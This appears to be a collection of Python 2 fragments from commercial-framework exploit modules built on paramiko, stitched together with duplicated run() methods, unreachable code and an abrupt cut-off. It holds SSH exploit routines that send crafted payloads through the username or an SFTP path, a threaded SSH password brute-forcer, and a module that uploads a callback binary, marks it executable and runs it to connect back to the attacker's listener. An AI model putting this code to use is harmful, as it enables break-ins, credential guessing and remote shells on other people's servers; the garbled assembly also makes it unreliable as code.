def open_ssh_transport(self, sock):
t = paramiko.Transport(sock)
try:
t.connect()
except paramiko.SSHException, e:
if "Error reading SSH protocol" in str(e):
self.log("[D2] Connection has been overwhelmed (or is not SSH!)")
t.close()
self.log("[D2] Thread sleeping to let server recover")
time.sleep(120)
return None
def test_ssh_server(self):
self.log('[D2] Test SSH server on %s' % self.host)
sock = self.connect_to_host()
if sock == None:
return 1
t = paramiko.Transport(sock)
try:
t.connect()
except paramiko.SSHException, e:
if "Error reading SSH protocol" in str(e):
self.log("[D2] Connection has been overwhelmed (or is not SSH!)")
t.close()
return 1
def do_sftp(self, arg):
"""\nSend a file by SSH protocol\n"""
args = arg.split()
if len(args) != 6:
print "Usage: sftp [put|get] <host:port> <user> <pass> <src file> <dest file>\n"
return
method = args[0]
if method != "put" and method != "get":
print "Invalid method: only put or get valid method\n"
return
host = args[1].split(":")[0]
port = int(args[1].split(":")[1])
user = args[2]
passwd = args[3]
src = args[4]
dest = args[5]
#paramiko_log_file = "paramiko.log"
#paramiko.util.log_to_file(paramiko_log_file)
if not os.path.exists(src):
print "Source file %s not found !\n" % src
return
try:
t = paramiko.Transport((host, port))
t.connect(username=user, password=passwd)
sftp = paramiko.SFTPClient.from_transport(t)
if method == "put":
sftp.put(src, dest)
if method == "get":
sftp.get(src, dest)
except:
traceback.print_exc()
return
try:
t.close()
except:
pass
#os.unlink(paramiko_log_file)
return
def run(self):
self.getArgs()
if self.version == 0:
self.log("WP> Autoversioning failed.")
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
payload = self.makesploit()
self.result_error = 0
try:
self.s = self.gettcpsock()
self.s.connect((self.host, self.port))
except:
self.log("WP> Attack reported no open socket - service died?")
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
try:
self.log("WP> Setting up SSH transport")
self.transport = paramiko.Transport(self.s)
except:
self.log("WP> Transport failed")
return 0
self.log("WP> Sending Exploit")
try:
self.transport.connect(username=payload, password=self.password)
time.sleep(2)
self.transport.close()
except:
ignore = ''
time.sleep(5)
if self.result_error == 0:
ret = self.wp_postExploitShellcode(s)
if ret:
return ret
ret = self.ISucceeded()
self.setInfo("WP> %s attacking %s:%d - completed" %
(NAME, self.host, self.port))
return ret
def connect_to_host(self):
self.s=self.gettcpsock()
try:
self.log( "Connecting.....")
self.s.connect((self.host,self.port))
self.log( "Done")
except socket.error:
self.log("Cannot connect to target on port %d"%(self.port))
return 0
#paramiko.util.log_to_file('./para.logs')
try:
self.log("Setting up SSH transport")
self.transport=paramiko.Transport(self.s)
except Exception, err:
#transport.close()
self.log( "transport failed: %s"%(err))
return 0
def run(self):
self.getArgs()
if self.version == 0:
self.log("WP> Autoversioning failed.")
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
payload = self.makesploit()
self.result_error = 0
try:
self.s = self.gettcpsock()
self.s.connect((self.host, self.port))
except:
self.log("WP> Attack reported no open socket - service died?")
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
try:
self.log("WP> Setting up SSH transport")
self.transport = paramiko.Transport(self.s)
except:
self.log("WP> Transport failed")
return 0
try:
self.log("WP> Authenticating (%s:%s)" % (self.user, self.password))
self.transport.connect(username=self.user, password=self.password)
self.ssh_version = self.transport.remote_version
except:
self.log(
"WP> Authentication failed - if credentials valid rerun exploit"
)
self.transport.close()
self.s.close()
return 0
try:
sftp_ch = paramiko.SFTPClient.from_transport(self.transport)
except:
self.log(
"WP> Authentication failed - if credentials valid rerun exploit"
)
self.transport.close()
self.s.close()
return 0
try:
content = sftp_ch.listdir(".")
except:
self.log(
"WP> Authentication Failed - if credentials valid rerun exploit"
)
self.transport.close()
self.s.close()
return 0
self.log("WP> Authentication Complete")
self.log("WP> Sending Exploit")
try:
sftp_ch.listdir(payload)
except:
self.log(
"WP> SSH Transport returned error on send - rerun exploit if payload not successful"
)
time.sleep(3)
self.transport.close()
self.s.close()
# Check if follow up is required for some shellcodes
if self.result_error == 0:
ret = self.wp_postExploitShellcode()
if ret:
return ret
ret = self.ISucceeded()
self.setInfo("WP> %s attacking %s:%d - completed" %
(NAME, self.host, self.port))
return ret
def run_in_thread(self):
"""
Each thread makes connections and tries passwords
"""
password = "******"
#six is default so we do one less
max_tries_per_connect = 5
no_more_passwords = False
while password != None or self.done == False:
if self.state == self.HALT:
self.log("Thread halting.")
return
if self.done:
break
sock = self.gettcpsock()
try:
sock.connect((self.host, self.port))
except socket.error:
self.log("Failed to connect to %s:%d" % (self.host, self.port))
self.log("Ending this thread.")
self.connections_failing = True
return
t = paramiko.Transport(sock)
try:
t.connect()
except paramiko.SSHException, msg:
self.log("%s is not the password: %s" % (password, msg))
if "Error reading SSH protocol" in str(msg):
self.log(
"Connection has been overwhelmed (or is not SSH!)")
t.close()
del t
self.log("Thread sleeping to let server recover")
#you have to sleep for an ungodly time here.
time.sleep(120)
continue
for i in xrange(0, max_tries_per_connect):
self.mylock.acquire()
try:
password = self.passwords.next()
except StopIteration:
no_more_passwords = True
self.mylock.release()
if no_more_passwords:
self.done = True
return
try:
self.log("Trying %s:%s" % (self.user, password))
t.auth_password(username=self.user, password=password)
#we got a "Bad auth" message from the server
except paramiko.SSHException, msg:
self.log("SSH Exception: %s" % msg)
else:
self.log("Found password: %s" % password)
self.found_password = password
self.done = True
if self.full_close:
t.close()
else:
del t
return
class theexploit(canvasexploit):
def __init__(self):
canvasexploit.__init__(self)
self.name = NAME
self.host = ""
self.port = 22
self.cbackport = 5555
self.user = ""
self.passwd = ""
self.version = 0
self.dest = ""
self.rsakey = ""
self.dsakey = ""
def getargs(self):
self.host = self.target.interface
self.port = int(self.argsDict.get("port", self.port))
self.version = int(self.argsDict.get("version", self.version))
self.cbackport = int(self.argsDict.get("cback_port", self.cbackport))
self.user = self.argsDict.get("user", self.user)
self.passwd = self.argsDict.get("passwd", self.passwd)
self.rsakey = self.argsDict.get("rsakey", self.rsakey)
self.dsakey = self.argsDict.get("dsakey", self.dsakey)
self.dest = self.argsDict.get("dest", self.dest)
def make_auth(self, t):
if not self.user:
self.log("You must specify an user !")
return 1
if self.user and self.passwd:
t.auth_password(username=self.user, password=self.passwd)
if not t.is_authenticated():
self.log("Authentication failed !")
t.close()
return 1
elif self.rsakey:
try:
key = paramiko.RSAKey.from_private_key_file(self.rsakey)
except paramiko.PasswordRequiredException:
self.log("Password required !")
return
t.auth_publickey(self.user, key)
elif self.dsakey:
try:
key = paramiko.DSSKey.from_private_key_file(self.dsakey)
except paramiko.PasswordRequiredException:
self.log("Password required !")
return
t.auth_publickey(self.user, key)
else:
self.log(
"Error with authentication parameters (user, passwd, rsa key or dsa key)"
)
return 1
return 0
def run(self):
self.getargs()
self.setInfo("%s (in progress)" % (NAME))
interface = self.engine.get_callback_interface()
if self.version == 0:
self.callback = self.engine.start_listener(interface, LINUXMOSDEF,
self.cbackport)
if self.version == 1:
self.callback = self.engine.start_listener(interface,
SOLARISMOSDEF_INTEL,
self.cbackport)
if self.version == 2:
self.callback = self.engine.start_listener(interface,
SOLARISSPARCMOSDEF,
self.cbackport)
if self.version == 3:
self.callback = self.engine.start_listener(interface,
FREEBSDMOSDEF,
self.cbackport)
if self.version == 4:
self.callback = self.engine.start_listener(interface,
AIXMOSDEF_52_PPC,
self.cbackport)
if self.callback == 0:
return 0
if not self.dest:
self.log("Desination file not specified")
self.setInfo("%s (failed)" % (NAME))
return 0
bin = TARGETS[self.version][1]
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.host, self.port))
except Exception, e:
self.log("Connect failed: %s" % str(e))
return 0
t = paramiko.Transport(sock)
try:
t.start_client()
except paramiko.SSHException:
self.log("SSH negotiation failed")
return 0
try:
i = self.make_auth(t)
if i == 1:
return 0
#t.connect(username=self.user, password=self.passwd)
sftp = paramiko.SFTPClient.from_transport(t)
sftp.put("3rdparty/D2SEC/exploits/d2sec_sshmosdef/%s" % bin,
self.dest)
sftp.close()
except:
self.log("Can't upload cback binary")
self.setInfo("%s (failed)" % (NAME))
return 0
try:
t.close()
except:
pass
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.host, self.port))
except Exception, e:
self.log("Connect failed: %s" % str(e))
return 0
self.setInfo("%s (failed)" % (NAME))
return 0
try:
t.close()
except:
pass
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.host, self.port))
except Exception, e:
self.log("Connect failed: %s" % str(e))
return 0
t = paramiko.Transport(sock)
try:
t.start_client()
except paramiko.SSHException:
self.log("SSH negotiation failed")
return 0
try:
self.make_auth(t)
chan = t.open_session()
chan.exec_command(
"chmod 755 %s; %s %s %d" %
(self.dest, self.dest, interface, self.cbackport))
chan.close()
except: